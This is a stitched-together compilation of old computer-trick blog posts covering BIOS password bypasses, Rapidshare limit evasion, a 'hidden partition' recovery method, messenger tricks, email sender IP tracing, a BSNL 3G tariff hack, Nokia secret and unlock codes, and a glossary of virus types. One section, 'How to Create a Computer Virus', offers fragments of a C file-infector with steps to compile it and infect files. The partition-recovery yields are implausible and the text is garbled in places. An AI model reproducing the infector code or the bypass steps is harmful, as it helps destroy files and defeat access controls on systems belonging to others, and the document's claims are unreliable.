Enox xo11nE
Epox central
Freetech Posterie
IWill iwill
Jetway spooml
Packard Bell bell9
Siemens SKY_FOX
Toshiba Toshiba


Most Toshiba laptops and some desktop systems will bypass the BIOS password if the left shift key is held down during boot


Press both mouse buttons repeatedly during the boot


Password cracking software

The following software can be used to either crack or reset the BIOS on many chipsets. If your PC is locked with a BIOS administrator password that will not allow access to the floppy drive, these utilities may not work. Also, since these utilities do not come from the manufacturer, use them cautiously and at your own risk.

Cmos password recovery tools 3.1
!BIOS (get the how-to article)


Using the Motherboard "Clear CMOS" Jumper or Dipswitch settings

Many motherboards feature a set of jumpers or dipswitches that will clear the CMOS and wipe all of the custom settings including BIOS passwords. The locations of these jumpers / dipswitches will vary depending on the motherboard manufacturer and ideally you should always refer to the motherboard or computer manufacturers documentation. If the documentation is unavailable, the jumpers/dipswitches can sometimes be found along the edge of the motherboard, next to the CMOS battery, or near the processor. Some manufacturers may label the jumper / dipswitch CLEAR - CLEAR CMOS - CLR - CLRPWD - PASSWD - PASSWORD - PWD. On laptop computers, the dipswitches are usually found under the keyboard or within a compartment at the bottom of the laptop.
Please remember to unplug your PC and use a grounding strip before reaching into your PC and touching the motherboard. Once you locate and rest the jumper switches, turn the computer on and check if the password has been cleared. If it has, turn the computer off and return the jumpers or dipswitches to its original position.


Removing the CMOS Battery

The CMOS settings on most systems are buffered by a small battery that is attached to the motherboard. (It looks like a small watch battery). If you unplug the PC and remove the battery for 10-15 minutes, the CMOS may reset itself and the password should be blank. (Along with any other machine specific settings, so be sure you are familiar with manually reconfiguring the BIOS settings before you do this.) Some manufacturers backup the power to the CMOS chipset by using a capacitor, so if your first attempt fails, leave the battery out (with the system unplugged) for at least 24 hours. Some batteries are actually soldered onto the motherboard making this task more difficult. Unsoldering the battery incorrectly may damage your motherboard and other components, so please don't attempt this if you are inexperienced. Another option may be to remove the CMOS chip from the motherboard for a period of time.
Note: Removing the battery to reset the CMOS will not work for all PC's, and almost all of the newer laptops store their BIOS passwords in a manner which does not require continuous power, so removing the CMOS battery may not work at all. IBM Thinkpad laptops lock the hard drive as well as the BIOS when the supervisor password is set. If you reset the BIOS password, but cannot reset the hard drive password, you may not be able to access the drive and it will remain locked, even if you place it in a new laptop. IBM Thinkpads have special jumper switches on the motherboard, and these should be used to reset the system.


Overloading the KeyBoard Buffer

On some older computer systems, you can force the CMOS to enter its setup screen on boot by overloading the keyboard buffer. This can be done by booting with the keyboard or mouse unattached to the systems, or on some systems by hitting the ESC key over 100 times in rapid succession.


Jumping the Solder Beads on the CMOS

It is also possible to reset the CMOS by connecting or "jumping" specific solder beads on the chipset. There are too many chipsets to do a breakdown of which points to jump on individual chipsets, and the location of these solder beads can vary by manufacturer, so please check your computer and motherboard documentation for details. This technique is not recommended for the inexperienced and should be only be used as a "last ditch" effort.


Using a professional service

If the manufacturer of the laptop or desktop PC can't or won't reset the BIOS password, you still have the option of using a professional service. Password Crackers, Inc., offers a variety of services for desktop and laptop computers for between $100 and $400. For most of these services, you'll need to provide some type of legitimate proof of ownership. This may be difficult if you've acquired the computer second hand or from an online auction.

Uninstall Windows Xp And Return To My Old Windows

How can I uninstall Windows XP and return to my old Windows 98?

If you've upgraded to XP from Windows Me or Windows 98, go to the Add/Remove Programs Control Panel applet and click Uninstall Windows XP.

If you want, you can also uninstall XP from the command prompt by performing the following steps:

* Start the computer in Safe Mode with Command Prompt support (press F8 during start up).
* Navigate to %systemroot%\system32.
* Type osuninst.exe and press Enter.
* Follow the onscreen instructions.

If XP was installed as a dual-boot system along with Win98 or W2K then you can simply format the partition on which it is installed. That is one of the reasons I always recommend to install separate operating systems on separate partitions!

Note: Windows XP Professional provides an uninstall tool when upgrading from Windows 98 on a drive formatted as FAT or FAT32. Therefore, when upgrading this type of drive, you will not have the option to upgrade to NTFS, as this would negate the uninstall option. However, you can convert the drive to NTFS after installation if you choose.

Unlimited Rapidshare Downloads

Unlimited Rapidshare Downloads

Its very easy to fool Rapid Share server if your IP address is assigned by your ISP. Just follow these simple steps:

clean up IE or netscape cookie( In this case the one that belong to rapidshare website)
On Command prompt
type -----> ipconfig /flushdns <---Enter
type -----> ipconfig /release <---Enter
type -----> ipconfig /renew <---Enter
type -----> exit <--------Enter

Or save these commands in a bat file and run it everytime you need to fool Rapidshare server.Remember to clean up rapidshare cookie in your temp Internet files folder.

Now you should be ready to download as many files as you want from their server.

And there is this cool link: paste it in the browser and see

Unused space on hard drives recovered?

Updated Hidden partitions revealed

By INQUIRER staff: Tuesday 09 March 2004, 14:33

READER WILEY SILER has sent us a method which he said was discovered by Scott Komblue and documented by himself which they claim can recover unused areas of the hard drive in the form of hidden partitions.
We haven't tried this here at the INQUIRER, and would caution readers that messing with your hard drive is done at your own peril and very likely breaches your warranty. Here is what Wiley and Scott did. µ

* UPDATE Does this work? We're not going to try it on our own machine thank you very much. Instead, we're waiting for a call from a hard drive company so we can get its take on these claims.

** UPDATE II A representative for large hard drive distributor Bell Micro said: "This is NOT undocumented and we have done this in the past to load an image of the original installation of the software. When the client corrupted the o/s we had a boot floppy thatopened the unseen partition and copied it to the active or seen partition. It is a not a new feature or discovery. We use it ourselves without any qualms".

*** UPDATE III See the letters column today, here.

Required items
Ghost 2003 Build 2003.775 (Be sure not to allow patching of this software) 2 X Hard Drives (OS must be installed on both.) For sake of clarity we will call the drive we are trying to expand (T) in this document (means Target for partition recover). The drive you use every day, I assume you have one that you want to keep as mater with your current OS and data, will be the last dive we install in this process and will be called (X) as it is your original drive.

1. Install the HDD you wish to recover the hidden partitions (hard drive T) on as the master drive in your system with a second drive as a slave (you can use Hard Drive X if you want to). Any drive will do as a slave since we will not be writing data to it. However, Ghost must see a second drive in order to complete the following steps. Also, be sure hard drive T has an OS installed on it You must ensure that the file system type is the same on both drive (NTFS to NTFS or FAT32 to FAT32, etc)

2. Install Ghost 2003 build 2003.775 to hard drive T with standard settings. Reboot if required.

3. Open Ghost and select Ghost Basic. Select Backup from the shown list of options. Select C:\ (this is the drive we want to free partition on on hard drive T) as our source for the backup. Select our second drive as the target. (no data will be written so worry not). Use any name when requested as it will not matter. Press OK, Continue, or Next until you are asked to reboot.

Critical step
4. Once reboot begins, you must shutdown the PC prior to the loading of DOS or any drivers. The best method is to power down the PC manually the moment you see the BIOS load and your HDDs show as detected.

5. Now that you have shutdown prior to allowing Ghost to do its backup, you must remove the HDD we are attempting to expand (hard drive T which we had installed as master) and replace it with a drive that has an OS installed on it. (This is where having hard drive X is useful. You can use your old hard drive to complete the process.) Place hard drive T as a secondary drive in the system. Hard drive X should now be the master and you should be able to boot into the OS on it. The best method for this assuming you need to keep data from and old drive is:

Once you boot into the OS, you will see that the second drive in the system is the one we are attempting to expand (hard drive T). Go to Computer Management -> Disk Management

You should see an 8 meg partition labeled VPSGHBOOT or similar on the slave HDD (hard drive T) along with a large section of unallocated space that did not show before. DO NOT DELETE VPSGHBOOT yet.

6. Select the unallocated space on our drive T and create a new primary or extended partition. Select the file system type you prefer and format with quick format (if available). Once formatting completes, you can delete the VPSGHBOOT partition from the drive.

7. Here is what you should now see on your T drive.

a. Original partition from when the drive still had hidden partitions
b. New partition of space we just recovered.
c. 8 meg unallocated partitions.

8. Do you want to place drive T back in a PC and run it as the primary HDD? Go to Disk Management and set the original partition on T (not the new one we just formatted) to and Active Partition. It should be bootable again if no data corruption has occurred.

Do not try to delete both partitions on the drive so you can create one large partition. This will not work. You have to leave the two partitions separate in order to use them. Windows disk management will have erroneous data in that it will say drive size = manus stated drive size and then available size will equal ALL the available space with recovered partitions included.

This process can cause a loss of data on the drive that is having its partitions recovered so it is best to make sure the HDD you use is not your current working HDD that has important data. If you do this on your everyday drive and not a new drive with just junk on it, you do so at your own risk. It has worked completely fine with no loss before and it has also lost the data on the drive before. Since the idea is to yield a huge storage drive, it should not matter.

Interesting results to date:
Western Digital 200GB SATA
Yield after recovery: 510GB of space

IBM Deskstar 80GB EIDE
Yield after recovery: 150GB of space

Maxtor 40GB EIDE
Yield after recovery: 80GB

Seagate 20GB EIDE
Yield after recovery: 30GB

Unknown laptop 80GB HDD
Yield: 120GB

Use Hotkeys to Switch Programs

Use Hotkeys to Switch Programs

If you routinely use a specific set of programs, you can set up hotkeys that will launch or directly switch among them instead of cycling with Alt-Tab. Find a desktop or Start menu shortcut that launches a program and select Properties. On the Shortcut tab, click in the Shortcut key box, and press the key combination you want to use. Be sure to choose key combinations that are not needed by any of your programs; for example, use Alt-Shift-1, Alt-Shift-2.

How to use the Google calculator:

How to use the Google calculator:

Google’s calculator tries to understand the problem you are attempting to solve without requiring you to use special syntax. However, it may be helpful to know the most direct way to pose a question to get the best results. Listed below are a few suggestions for the most common type of expressions (and a few more esoteric ones).

Most operators come between the two numbers they combine, such as the plus sign in the expression 1+1.

Operator Function Example
+ addition 3+44
- subtraction 13-5
* multiplication 7*8
/ division 12/3
^ exponentiation (raise to a power of) 8^2
% modulo (finds the remainder after division) 8%7
choose X choose Y determines the number of ways of choosing a set of Y elements from a set of X elements 18 choose 4
th root of calculates the nth root of a number 5th root of 32
% of X % of Y computes X percent of Y 20% of 150

Some operators work on only one number and should come before that number. In these cases, it often helps to put the number in parentheses.

Operator Function Example
sqrt square root sqrt(9)
sin, cos, etc. trigonometric functions (numbers are assumed to be radians) sin(pi/3)
tan(45 degrees)
ln logarithm base e ln(17)
log logarithm base 10 log(1,000)

A few operators come after the number.

Operator Function Example
! factorial 5!

Other good things to know

You can force the calculator to try and evaluate an expression by putting an equals sign (=) after it. This only works if the expression is mathematically resolvable. For example, 1-800-555-1234= will return a result, but 1/0= will not.

Parentheses can be used to enclose the parts of your expression that you want evaluated first. For example, (1+2)*3 causes the addition to happen before the multiplication.

The in operator is used to specify what units you want used to express the answer. Put the word in followed by the name of a unit at the end of your expression. This works well for unit conversions such as: 5 kilometers in miles.

You can use hexadecimal, octal and binary numbers. Prefix hexadecimal numbers with 0x, octal numbers with 0o and binary numbers with 0b. For example: 0x7f + 0b10010101.

The calculator understands many different units, as well as many physical and mathematical constants. These can be used in your expression. Many of these constants and units have both long and short names. You can use either name in most cases. For example, km and kilometer both work, as do c and the speed of light.

Feel free to experiment with the calculator as not all of its capabilities are listed here. To get you started, we’ve included a few expressions linked to their results.

1 a.u./c
1.21 GW / 88 mph
e^(i pi)+1
100 miles in kilometers
sine(30 degrees)
G*(6e24 kg)/(4000 miles)^2
0x7d3 in roman numerals

More info on:


Way To Download From Brturbo, FireFox

Way To Download From Brturbo, FireFox

Just Thought I Would Let U Know A Good And Easy Way To Download From Brturbo Is Through The Browser FireFox.
Basically If The File Is There It Normally Takes 7 - 15 Mins To Connect If The File Not There It Pops Up.
You Dont Need To Mess About With Proxies Or Anything All You Need Is FireFox



How to Create a Computer Virus?

This program is an example of how to create a virus in c.This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file.Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on.Here’s the source code of the virus program.


FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
if(host==NULL) goto next;
printf(“Infecting %s\n”,ffblk.ff_name,a);
printf(“DONE! (Total Files Infected= %d)”,a);
printf(“TIME TAKEN=%f SEC\n”,


BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile


3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect

BORLAND C++ 5.5 (32-BIT) :

1. Compile once,note down the generated EXE file length in bytes

2. Change the value of X in source code to this length in bytes

3. Recompile it.The new EXE file is ready to infect


1. Open new empty folder


3. Run the virus EXE file there you will see all the files in the current directory get infected.

4.All the infected files will be ready to reinfect

That’s it


Change the Title of Yahoo Messenger

Here’s how you change the title text that appears at the top of the Messenger window. By default, this is “Yahoo! Messenger”, followed by your status. Simply edit the ymsgr.ini file, which you will find in the same folder as the Messenger program, in your Program Files folder. Locate the file and open it in Notepad. Then, at the end, add the following:

caption=YOUR TEXT

Here, “YOUR TEXT” is whatever you want in the title bar. Save the file and close Messenger. When you restart it you will see your text in the title bar.

Chat without Yahoo Messenger or Gtalk

Can we chat without Yahoo messenger? Most of us are familiar with the most widely used applications such as Yahoo messenger and Gtalk to carry out chatting with our friends.But here I’ll show how to chat without Yahoo messenger or Gtalk.As we all know the information we exchange with their servers(Yahoo or Gtalk) are recorded and stored along with the corresponding IP addresses.This may hurt our privacy since all the information we exchange while chatting has to pass through a third party server.
Moreover if the matter is highly confidential, then it is necessary to have a totally private chat where the messages are exchanged only between the people involved in the chat and not with any other third party servers.At these situations, it is better to chat without Yahoo messenger.
So, how to carry out a private chat without Yahoo messenger or Gtalk?
For this purpose there exists many softwares that support’s you to host a web-based chat system without any additional software or services.So with these softwares the exchange of messages takes place directly between the two persons engaging in the chat and will not pass through any other third party server.This ensures 100% privacy and eliminates the desperate need to chat with Yahoo messenger.
One of my favorite program for private chat is Easy Chat Server

Easy Chat Server is a Windows program that allows you to host a web-based chat system without any additional software or services. Unlike other chat server, you do not need to install Java. It allows you to build one or more web-based chat rooms on your machine, and provides advanced chat functionalities aiming to offer discussion space for your users, customers and partners.
Here are some of the screenshots of Easy Chat Server.

Key Features of Easy Chat Server:
Easy to use, Simple installation that will have you up and running in minutes.
128-Bit Security Socket Layer(SSL) support. support for server level certificate creation.
Instantly runs a complete chat server on your PCs – does not need to install any Web Server.
Supports full private messaging and One to One private chat.
Support of images, smileys, avatar icons.
Full chat and access logs are available within the chat server.
Have a built-in IP Filter, supports banning/unbanning IP address, securely.
Multiple styles available for the user to customize rooms.
Unlimited rooms and users, no any annual, per-user, or maintenance fees.
No spyware, adware or other unwanted extra programs.

Mozilla Firefox Hotkeys | Keyboard Shortcuts

Select all text on a webpage
Open the Bookmarks sidebar
Copy the selected text to the Windows clipboard
Bookmark the current webpage
Find text within the current webpage
Find more text within the same webpage
Opens the webpage History sidebar
Open the Bookmarks sidebar
Opens the Download Dialogue Box
Places the cursor in the Web Search box ready to type your search
Places the cursor into the URL box ready to type a website address
Opens your mail program (if you have one) to create a new email message
Opens a new Firefox window
Open a local file
Print the current webpage
Reloads the current webpage
Save the current webpage on your PC
Opens a new Firefox Tab
View the page source of the current webpage
Paste the contents of the Windows clipboard
Closes the current Firefox Tab or Window (if more than one tab is open)
Cut the selected text
Undo the last action
Windows Keyboard Shortcuts for Mozilla Firefox
Opens Firefox help
Find more text within the same webpage
Reload the current webpage
Toggles the cursor between the address/URL input box and the current webpage
Toggles Caret Browsing on and off. Used to be able to select text on a webpage with the keyboard
Switch to Full Screen mode

Internet Explorer Hotkeys | keyboard Shortcuts

These are achieved by holding down the CONTROL (CTRL) key and pressing the assigned key

To Select all items on a webpage use CTRL and A.

To Copy a selected item to the clipboard use CTRL and C.

To Paste an item from the clipboard into a document use CTRL and V.

To Add the current page/document to your favorites use CTRL and D.

To Open the IE search utility use CTRL and E.

To Open the FIND box to search the current document use CTRL and F.

To Open the History utility use CTRL and H.

To Open the Favorites utility use CTRL and I.

To Go to a new location/document use CTRL and L. Also CTRL and O.

To Open a new Explorer window use CTRL and N.

To Print the current page/document use CTRL and P.

To Refresh the current page/document use CTRL and R or use the F5 key.

To Save the current document/page use CTRL and S.

To Close the current Explorer window use CTRL and W.

These are achieved by holding down and pressing a combination of keys

To go to your default homepage use ALT and the HOME key.

To go forward one page (equivalent to the FORWARD button) use ALT and the right arrow key.

To go back one page (equivalent to the BACK button) use ALT and the left arrow key.

Multi Google Talk Login without any software

Just follow the simple steps Below:
1) Right click on the Google Talk shortcut.
2) click on Properties.
3) Go to Shortcut tab on Google Talk Properties window.
4) On the Target textbox, add in the /nomutex to the end of the line so that it looks like below (or you can simply copy and paste the below syntax and replace the original).
“c:\program files\google\google talk\googletalk.exe” /nomutex
5) Click on OK.
I didn't have to do anything after this and clicking on the shortcut multiple times just gave me different Google talk window.


To create a new shortcut for Google Talk:

1) Right-click on the desktop or anywhere you want to place the GTalk shortcut.
2) Select New on the right click context menu.
3) Then select Shortcut.
4) Copy and paste the following line to the text box when prompted to type the location of the item:
“c:\program files\google\google talk\googletalk.exe” /nomutex

5) Click on Next.
6) Give the shortcut a proper name such as Google Talk or Google
Talk Multiple or Google Talk Polygamy.
7) Click OK until you are done.

Find who is Invisible on Yahoo messenger

Sometimes some of your friends who appear offline in yahoo messenger may not be actually offline, they may in the 'Invisible' mode. This maybe if they are trying to ignore you or are too busy to talk to anyone.

There is this small trick that you can use to find out what the truth is.

Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check. The chat window will open obviously.
Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be two possibilities

1.If the user is offline Doodle are will show this "waiting for your friend to load Doodle" continuously .See in the picture below:
2. If the user is online (but in invisible mode), after few seconds (it can take up to one minute, depending on your connection speed), you should get a blank page like in the picture below. So you know that the user is online.

Hidden Emotions in Yahoo Messenger

Yahoo messenger is one of the mostly used chatting application accross the globe. So, Yahoo has many built in hidden emotions like laughing yahoo emotions, sad yahoo emotions, oncall, busy yahoo emotions and many more..

Below images contains all the yahoo emotions.

How to find the IP address of the sender in Gmail, Yahoo! mail or Hotmail

When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.

Finding IP address in Gmail

1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the headers,
* Click on More options corresponding to that thread. You should get a bunch of links.
* Click on Show original
4. You should get headers like this:
Gmail headers : name
Look for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is
That is be the IP address of the sender!
5. Track the IP address of the sender

Finding IP address in Yahoo! Mail

1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail
5. You should see similar headers like this:
Yahoo! headers : name
Look for Received: from followed by the IP address between square brackets [ ]. Here, it is
That is be the IP address of the sender!
6. Track the IP address of the sender

Finding IP address in Hotmail

1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked
* Click on Ok button
* Go back to the mails and open that mail
5. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address
Hotmail headers : name ,In this case the IP address of the sender is []. Jump to step 9.
6. If you find a header with Received: from followed by a Gmail proxy like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is []. Jump to step 9.
7. Or else if you have headers like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [] (Spam mail). Jump to step 9.
8. * If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.
9. Track the IP address of the sender

Multiple login in yahoo Without Using any Software

Multiple login in yahoo Without Using any Software

You can login with multiple id's on the same yahoo messenger without any download or patch .
Follow these steps :

1. Go to Start ----> Run . Type regedit, then enter .

2. Navigate to HKEY_CURRENT_USER --------> Software ---> yahoo --->pager---->Test

3. On the right page , right-click and choose new Dword value .

4. Rename it as Plural.

5. Double click and assign a decimal value of 1.

Its done!!
Now close registry and restart yahoo messenger and try Multiple Login


This trick will allow you to access internet through Calculator. Calculator can be used as a web browser.

1. Open your MS Calculator. This is normally found in Start => All Programs => Accessories => Calculator.

2. Open the help-window by pressing the F1 key.

3. Click the top-left corner icon of the help window once (Standard is a Document with a Question mark).

4. Select Go to URL-address.

5. Type your address into the available field, but remember to type http:// and not just www. (or equivalent).

Trick To Make Your Firefox Fast

This Firefox tricks will improve the speed & load time of firefox. And you will be able to surf faster.

Type about:config in the address bar, Then look for the following entries, and make the corresponding changes.
network.http.max-connections-per-server =32
network.http.max-persistent-connections-per-proxy =16
network.http.max-connections = 64
network.http.max-persistent-connections-per-server = 10
network.http.pipelining = true
network.http.pipelining.maxrequests = 200
network.http.request.max-start-delay = 0
network.http.proxy.pipelining = true
network.http.proxy.version = 1.0

Lastly right-click anywhere and select New- Integer. Name it nglayout.initialpaint.delay and set its value to 0. This value is the amount of time the browser waits before it acts on information it receives. Enjoy!!

Increase the speed of your internet connection without a new modem

As more and more people get quick connections to the internet, such as cable or ADSL, it becomes apparent to the user of a simple dial-up modem that the World Wide Web can quickly turn into the World Wide Wait. Here a trick that can help speed up your current modem without shelling out the big bucks.

There is a setting located in your windows registry called the Maximum Transfer Unit (MTU). This determines the size of the packets of data sent between your and your server. In Windows 95, this setting is has a value of 1,500 bytes when the actual size of internet packets is 1,000 bytes. This can sometimes slow things down. To remedy the situation, simply follow these steps:
In the registry editor (Start > Run > regedit.exe), navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetTrans.

In the NetTrans folder you should find another folder named "000x" in which x represents a fourth digit. Right-click on the "000x" folder and select New and StringValue. Rename the item that appears in the panel on the right side to MaxMTU, then double-click it to bring up the Edit String box and give it a velue of 1002.

Remember to keep playing with the MaxMTU value until you feel that your internet connection has greatly sped up. Some people report huge speed gains using this tricks, while others hardly notice a difference. In any case, it's definetly worth a try.

Speed up your internet by 20%

Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc

You can get it back:

Click Start then Run and type "gpedit.msc" without quotes. This opens the group policy editor.

Then go to:
--> Local Computer Policy
--> Computer Configuration
--> Administrative Templates

--> Network

--> QOS Packet Scheduler

--> Limit Reservable Bandwidth.

Double click on Limit Reservable bandwidth.

It will say it is not configured, but the truth is under the 'Explain' tab i.e." By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."
So the trick is to ENABLE reservable bandwidth, then set it to ZERO. This will allow the system to reserve nothing, rather than the default 20%.It works on Win 2000 as well.

BSNL 3G Hack trick to Unlimited Browsing at normal GPRS rate

Here is a 100 % working trick to unlimited use BSNL 3G at the cost of
Normal GPRS

First of all Buy a normal 2g bsnl's sim card and keep balance 50+ rs.
now activate gprs by sending sms GPRS PRE to 53733 It will be
activated in 24 hours, after activation get gprs settings by calling customer care

Now do e-recharge with 230 rs (or whatever unlimited plan exists in your area)
in it, After activation You have to chnage only one thing in yor 3G enabled cell.

Go to settings>tools>settings>phone&g
t;network>network mode> now select UMTS

THEN do manual searching for network u will fing bsnl 3g network there wid small 3g logo along wid its name, select it as default

Now see your data singnals logo, it is converted into 3G
You will get near about 500kbps to 1200 kbps speed
Remember use BSNLEGPRS or BSNLPREPAID as your access point

`Trick to Complete Formatting Mobile Phone

Here is the trick for complete formatting of your virus infected or other problem arriving mobile phone...

This trick is for almost all Nokia models.

1. Switch off your phone...
2. Remove SIM card & memory chip...
3. Now press & hold keys - 3,*,call green) ...
4. Then without leaving these three buttons press power button...
5. Formatting task will be started...
6. Remember its a very rare trick....

Yes its true its call hard format.

key * , 3 , Call button (green) press and hold when display is on than formatting screen is displayed.

Wait for formatting to be finished,

Before carrying out this process make sure you have copied all your contacts and notes onto your Memory, because every thing will be deleted. When its finished the formatted phone may be like new, just like when u have brought it from showroom.

Some Useful Nokia mobile phone Secret Codes list

On the main screen type
*#06# for checking the IMEI (International Mobile Equipment Identity).
*#7780# reset to factory settings.
*#67705646# This will clear the LCD display (operator logo).
*#0000# To view software version.
*#2820# Bluetooth device address.
*#746025625# Sim clock allowed status.
*#62209526# - Display the MAC address of the WLAN adapter. This is available only in the newer devices that support WLAN
#pw+1234567890+1# Shows if sim have restrictions.

*#92702689# - takes you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair - if found (0000)
5. Shows life timer of phone (time passes since last start)

*#3370# - Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.
*#3370* - (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network.
*#4720# - Half Rate Codec activation.
*#4720* - Half Rate Codec deactivation. The phone will automatically restart

If you forgot wallet code for Nokia S60 phone, use this code reset: *#7370925538#
Note, your data in the wallet will be erased. Phone will ask you the lock code. Default lock code is: 12345

Press *#3925538# to delete the contents and code of wallet.

Unlock service provider: Insert sim, turn phone on and press vol up-arrow keys) for 3 seconds, should say pin code. Press C, then press * message should flash, press * again and 04*pin*pin*pin#

*#7328748263373738# resets security code.
Default security code is 12345
*#1471# Last call (Only Vodafone)

*#21# Allows you to check the number that "All Calls" are diverted to

*#30# Lets you see the private number

*#43# Allows you to check the "Call Waiting" status of your phone.

*#62# Allows you to check the number that "Divert If Unreachable (no service)" calls are diverted to

*#67# Allows you to check the number that "On Busy Calls" are diverted to

*#67705646# Removes operator logo on 3310 & 3330

*#73# Reset phone timers and game scores

*#746025625# Displays the SIM Clock status, if your phone supports this power saving feature "SIM Clock Stop Allowed", it means you will get the best standby time possible

*#7780# Restore factory settings

*#8110# Software version for the nokia 8110


Displays - 1.Serial Number, 2.Date Made,
3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data

12345 This is the default security code

press and hold #
Lets you switch between lines

Hidden Secret China Mobile Phones Codes

The following Mobile Phones codes works with various China mobile Phones such as Alkatel, Sigmatel, Carboonn, GFive, and more such China Mobile phones.

–Default user code : 1122, 3344, 1234, 5678
–Engineer mode : *#110*01#
–Factory mode : *#987#
–Enable COM port : *#110*01# -> Device -> Set UART -> PS Config -> UART1/115200
–Restore factory settings : *#987*99#
–LCD contrast : *#369#
–Software version : *#800#
–Software version : *#900#
–Set default language : *#0000# Send
–Set English language : *#0044# Send
–Set English language (new firmware) : *#001# Sen

Trace Mobile numbers or Ip-Address

Recently I came accross a website in which we can easily trace a Mobile number. For example , when we enter the 10 digit mobile number, then we get the Mobile Service provider, Location, City along with area. Thats really awesome.

This tool will be really helpful specially for business persons to verify the location etc...

The site link is indiatrace.com

Features of this site is

Trace Mobile Number

Trace Vehical Number

Trace Pin Code

Trace IP Address


How to check china mobile IMEI number valid and original?

Last month i.e.; November I came across a news article regarding China Mobiles and the importance of IMEI numbers. So here I provide a method by which you can check whether your phone has a valid and original IMEI number.

Mobile number without or wrong IMEI number are banned accorss India now. Mostly China mobile phone brands like Alkatel, Sigmatel, Spice, Carboonn, GFIVE and many more now provide valid IMEI number

Check China or any Mobile Phone IMEI Number Validity

1.Press *#06# on your mobile handset and note down the 15 digit IMEI number
2.Compose a new message from your mobile >> Type your 15 digit IMEI number >> Send it to 53232
3.If you get “Success” as the reply, then your mobile IMEI number is valid
4.If you get “Invalid IMEI” as the reply, that means your IMEI number is not valid
5.You are now done.

This will help you to know that your imei number is valid or not

-: Computer Viruses :-

What is a Computer Virus ?
A potentially damaging computer programme capable of reproducing itself causing great harm to files or other programs without permission or knowledge of the user.

Types of viruses :-
The different types of viruses are as follows-

1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.

Examples of boot- sector viruses are Michelangelo and Stoned.

2) File or Program Viruses :- Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .

Some common file viruses are Sunday, Cascade.

3) Multipartite Viruses :- A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector.
This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.

Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.

4) Stealth Viruses :- These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.

5) Polymorphic Viruses :- Polymorphic viruses have the ability to mutate implying that they change the viral code known as the signature each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it's presense.

6) Macro Viruses :- A macro virus is a computer virus that "infects" a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless.A macro virus is often spread as an e-mail virus. Well-known examples are Concept Virus and Melissa Worm.


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